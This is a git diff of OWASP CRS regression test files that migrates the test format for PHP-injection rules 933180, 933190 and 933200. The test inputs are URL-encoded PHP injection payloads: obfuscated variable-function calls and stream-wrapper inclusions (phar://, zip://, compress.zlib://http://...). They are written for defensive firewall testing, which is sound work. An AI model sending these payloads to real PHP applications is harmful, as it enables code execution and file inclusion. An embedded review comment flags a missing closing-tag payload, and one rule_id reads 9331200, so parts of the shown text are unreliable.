"HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "POST" + uri: / 
+ data: 'foo=%24__%5B%24_%5B1%5D%5D%287%29' + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] + - test_id: 9 desc: $__[@$c](8) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: 'foo=%24__%5B%40%24c%5D%288%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "POST" + uri: / + data: 'foo=%24__%5B%40%24c%5D%288%29' + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] + - test_id: 10 desc: $d['o'](9) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: '%24d%5B%27o%27%5D%289%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "POST" + uri: / + data: '%24d%5B%27o%27%5D%289%29' + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] + - test_id: 11 desc: ${@a}(10) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: 'foo=%24%7B%40a%7D%2810%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 
933180-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "POST" + uri: / + data: 'foo=%24%7B%40a%7D%2810%29' + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] + - test_id: 12 desc: ${'a'}(11) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?foo=%24%7B%27a%27%7D%2811%29" - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?foo=%24%7B%27a%27%7D%2811%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] + - test_id: 13 desc: ${@$b}(12) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%24%7B%40%24b%7D%2812%29" - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%24%7B%40%24b%7D%2812%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] + - test_id: 14 desc: ${$s20}['q53b3a6'](13) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - 
User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: '%24%7B%24s20%7D%5B%27q53b3a6%27%5D%2813%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "POST" + uri: / + data: '%24%7B%24s20%7D%5B%27q53b3a6%27%5D%2813%29' + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] + - test_id: 15 desc: $GLOBALS['cf908275'](14) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: 'foo=%24GLOBALS%5B%27cf908275%27%5D%2814%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "POST" + uri: / + data: 'foo=%24GLOBALS%5B%27cf908275%27%5D%2814%29' + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] + - test_id: 16 desc: $OOO000000{0}(15) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: 'c=%24OOO000000%7B0%7D%2815%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "POST" + uri: / + data: 'c=%24OOO000000%7B0%7D%2815%29' + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] + - test_id: 17 desc: $OOO0000O0 (16) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%24OOO0000O0%20%2816%29" - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%24OOO0000O0%20%2816%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] + - test_id: 18 desc: $_aB_4c[5]['d'] /*lol*/ (17) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%24_aB_4c%5B5%5D%5B%27d%27%5D%20%2F%2Alol%2A%2F%20%2817%29" - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-19 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%24_aB_4c%5B5%5D%5B%27d%27%5D%20%2F%2Alol%2A%2F%20%2817%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] + - test_id: 19 desc: $_aB_4c[@5]/*wat*/[@d] (18) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test 
agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: 'x=%24_aB_4c%5B%405%5D%2F%2Awat%2A%2F%5B%40d%5D%20%28%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-20 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "POST" + uri: / + data: 'x=%24_aB_4c%5B%405%5D%2F%2Awat%2A%2F%5B%40d%5D%20%28%29' + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] + - test_id: 20 desc: $_aB_4c/*foo*/[@5]/*bar*/[@d]/*baz*/(19) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: 'y=%24_aB_4c%2F%2Afoo%2A%2F%5B%405%5D%2F%2Abar%2A%2F%5B%40d%5D%2F%2Abaz%2A%2F%2819%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-21 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "POST" + uri: / + data: 'y=%24_aB_4c%2F%2Afoo%2A%2F%5B%405%5D%2F%2Abar%2A%2F%5B%40d%5D%2F%2Abaz%2A%2F%2819%29' + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] + - test_id: 21 desc: $___[@-_](20) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%24___%5B%40-_%5D%2820%29" - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-22 + - input: + 
dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%24___%5B%40-_%5D%2820%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] + - test_id: 22 desc: '@$___[@!+_](21)' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%40%24___%5B%40%21%2B_%5D%2821%29" - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-23 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%40%24___%5B%40%21%2B_%5D%2821%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] + - test_id: 23 desc: $b374k=@$s_func(22) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: 'foo=%24b374k%3D%40%24s_func%2822%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-24 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "POST" + uri: / + data: 'foo=%24b374k%3D%40%24s_func%2822%29' + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] + - test_id: 24 desc: $function\r\n (23) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: 
localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: 'foo=%24function%0D%0A%20%2823%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-25 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "POST" + uri: / + data: 'foo=%24function%0D%0A%20%2823%29' + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] + - test_id: 25 desc: $__[_](24) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%24__%5B_%5D%2824%29" - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-26 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%24__%5B_%5D%2824%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] + - test_id: 26 desc: $____[_]{_}[@_](25) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%24____%5B_%5D%7B_%7D%5B%40_%5D%2825%29" - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-27 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%24____%5B_%5D%7B_%7D%5B%40_%5D%2825%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] + - test_id: 27 desc: multiline with comments stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: x=%24_aB_4c%20%23foo%0D%0A%09%5B5%5D%2F%2Fbar%0D%0A%09%5B%27d%27%5D%20%2F%2Afoo%2A%2F%20%2817%29 - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-28 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "POST" + uri: / + data: x=%24_aB_4c%20%23foo%0D%0A%09%5B5%5D%2F%2Fbar%0D%0A%09%5B%27d%27%5D%20%2F%2Afoo%2A%2F%20%2817%29 + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] + - test_id: 28 desc: $$$z(29) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%24%24%24z%2829%29" - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-29 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%24%24%24z%2829%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] + - test_id: 29 desc: ${_.__}(30); stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - 
User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%24%7B_.__%7D%2830%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-30 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%24%7B_.__%7D%2830%29%3B" + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] + - test_id: 30 desc: $ {@_.__}(31); stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%24%20%7B%40_.__%7D%2831%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-31 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%24%20%7B%40_.__%7D%2831%29%3B" + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] + - test_id: 31 desc: $_[@-_]($_[@!+_] ) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%24_%5B%40-_%5D%28%24_%5B%40%21%2B_%5D%20%29" - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-32 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%24_%5B%40-_%5D%28%24_%5B%40%21%2B_%5D%20%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] + - test_id: 32 desc: $f(101).$f(120) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%24f%28101%29.%24f%28120%29" - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-33 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%24f%28101%29.%24f%28120%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] + - test_id: 33 desc: '@$b374k("foo")' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%40%24b374k%28%22foo%22%29" - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-34 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%40%24b374k%28%22foo%22%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] + - test_id: 34 desc: ${$foo->bar}(200) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%24%7B%24foo-%3Ebar%7D%28200%29" - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-35 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%24%7B%24foo-%3Ebar%7D%28200%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] + - test_id: 35 desc: $foo->$funcname() stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: '%24foo-%3E%24funcname%28%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-36 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "POST" + uri: / + data: '%24foo-%3E%24funcname%28%29' + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] + - test_id: 36 desc: Foo::$variable() stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=Foo%3A%3A%24variable%28%29" - version: "HTTP/1.1" - output: - log_contains: id "933180" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 
+ uri: "/get?x=Foo%3A%3A%24variable%28%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933190.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933190.yaml index 32e1408fa..ba6621baf 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933190.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933190.yaml @@ -1,25 +1,23 @@ --- meta: author: "NiceYouKnow, azurit" - description: None - enabled: true - name: 933190.yaml +rule_id: 933190 tests: - - test_title: 933190-1 + - test_id: 1 desc: "PHP Injection Attack: PHP Closing Tag Found" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - Cache-Control: "no-cache, no-store, must-revalidate" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: 'file_test=&submit=1' - version: HTTP/1.1 - output: - log_contains: id "933190" + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: 'file_test=&submit=1' + version: HTTP/1.1 + output: + log: + expect_ids: [933190] diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933200.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933200.yaml index aff09caf0..83a1a3e77 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933200.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933200.yaml 
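Review bot: In the 933190.yaml hunk the only test is described as "PHP Closing Tag Found", but the request body shown on the new side, `data: 'file_test=&submit=1'`, contains no `?>` sequence, so as rendered the positive test would not exercise what its desc claims and `expect_ids: [933190]` could not be satisfied. This is most likely an artefact of how the page was extracted (a `<?...?>` run in the value would be dropped as markup), so please confirm the committed file still carries the closing-tag payload. If it does not, restore the payload rather than loosening the expectation; the migration otherwise looks mechanical and consistent with the other files in this change.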
@@ -1,167 +1,165 @@ --- meta: author: "NiceYouKnow, azurit" - description: None - enabled: true - name: 933200.yaml +rule_id: 9331200 tests: - - test_title: 933200-1 + - test_id: 1 desc: "Positive test: PHP Injection Attack - Wrapper scheme detected (phar://)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/test.php?file=phar://phpinfo.zip/phpinfo.txt" - version: HTTP/1.1 - output: - log_contains: id "933200" - - test_title: 933200-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/test.php?file=phar://phpinfo.zip/phpinfo.txt" + version: HTTP/1.1 + output: + log: + expect_ids: [933200] + - test_id: 2 desc: "Positive test: PHP Injection Attack - Wrapper scheme detected (compress.bzip2://)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/test.php?file=compress.bzip2://file.bz2" - version: HTTP/1.1 - output: - log_contains: id "933200" - - test_title: 933200-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/test.php?file=compress.bzip2://file.bz2" + version: HTTP/1.1 + output: + log: + expect_ids: [933200] + - test_id: 3 desc: "Positive test: PHP Injection Attack - Wrapper scheme detected (compress.zlib://)" stages: - - stage: - input: - 
dest_addr: 127.0.0.1 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/test.php?file=compress.zlib://http://www.example.com/some_file.gz" - version: HTTP/1.1 - output: - log_contains: id "933200" - - test_title: 933200-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/test.php?file=compress.zlib://http://www.example.com/some_file.gz" + version: HTTP/1.1 + output: + log: + expect_ids: [933200] + - test_id: 4 desc: "Positive test: PHP Injection Attack - Wrapper scheme detected (zip://)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/test.php?file=zip://archive.zip" - version: HTTP/1.1 - output: - log_contains: id "933200" - - test_title: 933200-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/test.php?file=zip://archive.zip" + version: HTTP/1.1 + output: + log: + expect_ids: [933200] + - test_id: 5 desc: "Negative test: PHP Injection Attack - Non-existent wrapper scheme (lz77://)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: 